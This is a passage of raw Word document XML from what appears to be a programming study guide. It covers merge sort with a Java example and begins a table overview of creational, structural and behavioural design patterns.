          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Merge Sort</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Divide and Conquer</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithm that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D802392"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Divides</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the array into two halves,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E16F7C"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Recursively sorts</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each half,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E9A8D"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>merges</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the two sorted halves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FBD709"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58939B9A">
          <v:rect id="_x0000_i1999" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D753681"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B8E295"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Divide</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the array until each sub-array contains only one element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D94161"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Merge</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the sub-arrays in a sorted manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADD226"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1C53DFC">
          <v:rect id="_x0000_i2000" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763C036"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Time and Space Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1D199"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Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n log n) in all cases (best, average, worst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462CFB2"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Space Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n) – due to temporary arrays used during merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6B5E7"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76E7BA9E">
          <v:rect id="_x0000_i2001" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D61BE"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Java Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB958F"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public class MergeSort {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F05592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ergeSort(int[] arr, int left, int right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B391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f (left &lt; right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA825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mid = (left + right) / 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10569D2C" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D84D7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left, mid);        // Sort left half</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3621B091"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mid + 1, right);   // Sort right half</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F83B1" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EBEF0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arr, left, mid, right);     // Merge both halves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E7FB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B67FF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575968" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530DB33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rivate static void merge(int[] arr, int left, int mid, int right) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1F77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1 = mid - left + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E5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2 = right - mid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF29BAA" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424A9FE6"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L = new int[n1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E51DE9"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R = new int[n2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B947F0" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A09A94A"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i = 0; i &lt; n1; i++) L[i] = arr[left + i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0535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j = 0; j &lt; n2; j++) R[j] = arr[mid + 1 + j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A797005" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCB33A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i = 0, j = 0, k = left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118869BA" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394CCDE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mp;&amp; j &lt; n2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284D04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arr[k++] = (L[i] &lt;= R[j]) ? L[i++] : R[j++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36B25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965AF0A" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF90C3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rr[k++] = L[i++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795778C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j &lt; n2) arr[k++] = R[j++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1EEA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49EDF7C1" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4946749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ain(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF397A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arr = {38, 27, 43, 3, 9, 82, 10};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DB07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0, arr.length - 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238AEE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System.out.println(Arrays.toString(arr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AF20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A43677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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5C655"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2EF49F1">
          <v:rect id="_x0000_i2002" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F66CE4"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC41A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3, 9, 10, 27, 38, 43, 82]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582F101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Merge Sort is stable and preferred for sorting linked lists or large datasets where consistent performance matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21938140" w14:textId="3098B93F" w:rsidR="008F201A"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2003" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="008F201A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A1F56" w14:textId="08EEFE04" w:rsidR="00516033" w:rsidRPr="00CE4B95" w:rsidRDefault="00516033" w:rsidP="00516033">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc197867643"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Design Patterns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="0CD65147" w14:textId="77777777" w:rsidR="00D55EBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00D55EBE" w:rsidP="00D55EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA60662" w14:textId="62B87857" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6064A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="_Toc197867644"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Design pattern? Explain all design pattern?</w:t>
      </w:r>
      <w:r w:rsidR="00081EA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
    </w:p>
    <w:p w14:paraId="7F63EF9C" w14:textId="72678071" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8"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proven, reusable solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a common problem in software design. It represents best practices used by experienced developers to solve recurring design issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC340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3D971">
          <v:rect id="_x0000_i2004" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94A9D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Design Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11455B6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broadly categorized into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 main types</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0494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C681">
          <v:rect id="_x0000_i2005" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97C78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278"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="3586A8C8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CDD89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DF9DC56"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104B033" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A05DCD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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF527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sures only one instance of a class exists and provides global access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="76F09AAD" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE86E5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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EDEDDD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objects without specifying the exact class to be instantiated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="64C473CA" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076AD3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bstract Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28411B6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n interface for creating families of related objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="180C97D2" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9AE9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uilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FD64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structs a complex object step-by-step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="062673A9" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36290BA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totype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB0367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new objects by cloning existing ones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C2FDA9D"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20FF7C">
          <v:rect id="_x0000_i2006" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E25FB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7196"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="495F1F7C" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617E256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F6CBB6D"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194CB6A1" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6147BE8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1865ED4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expected by the client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6A2A8358" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F06FF4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3A7D0B6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couples abstraction from its implementation so they can vary independently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0477E019" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BFDB18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4E8FFA0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to represent part-whole hierarchies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="595470FB" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05DCD4B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03D9E5E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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="15337BAE" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177F264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03EC242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ubsystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="36D0E092" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731C8C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94E2AE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data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="58B0B56C" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0644162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7D12E38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urrogate or placeholder for another object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E2CCD60"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E97F">
          <v:rect id="_x0000_i2007" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF86E2"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7237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6FB7F171" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F766FF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1DB2CEE5"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1301666" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB67C7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39D23B0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ubject notifies observers automatically of any state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0E7B80D8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD8152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48AF772B"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selecting an algorithm at runtime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="03898CB4" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330A983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87F37B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operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="475CBE2F" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
